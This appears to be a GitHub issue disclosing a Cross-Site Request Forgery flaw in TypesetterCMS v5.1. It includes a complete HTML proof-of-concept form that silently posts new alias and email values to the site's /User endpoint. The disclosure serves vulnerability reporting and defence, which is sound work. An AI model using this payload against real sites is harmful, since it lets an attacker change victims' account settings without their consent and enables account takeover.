-
Notifications
You must be signed in to change notification settings - Fork 99
Closed
Description
TypesetterCMS v5.1 was discovered to contain a Cross-Site Request
Forgery (CSRF) which is exploited via a crafted POST request.
Vulnerability Type
Cross-Site Request Forgery (CSRF)
Vendor of Product
TypesetterCMS
Affected Product Code Base
TypesetterCMS - =5.1 are effected
Affected Component
All the POST requests
Attack Type
Remote
Impact Escalation of Privileges
true
Attack Vector
<html>
<!-- CSRF PoC-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.typesettercms.com/User" method="POST">
<input type="hidden" name="alias" value="TEST+1" />
<input type="hidden" name="homepage" value="" />
<input type="hidden" name="email" value="TEST+1@gmail.com" />
<input type="hidden" name="cmd" value="Save Settings" />
<input type="hidden" name="verified" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Discoverers
Danish Tariq
Ali Hassan Ghori
Reference
http://typesettercms.com
https://www.typesettercms.com/User
Metadata
Metadata
Assignees
Labels
No labels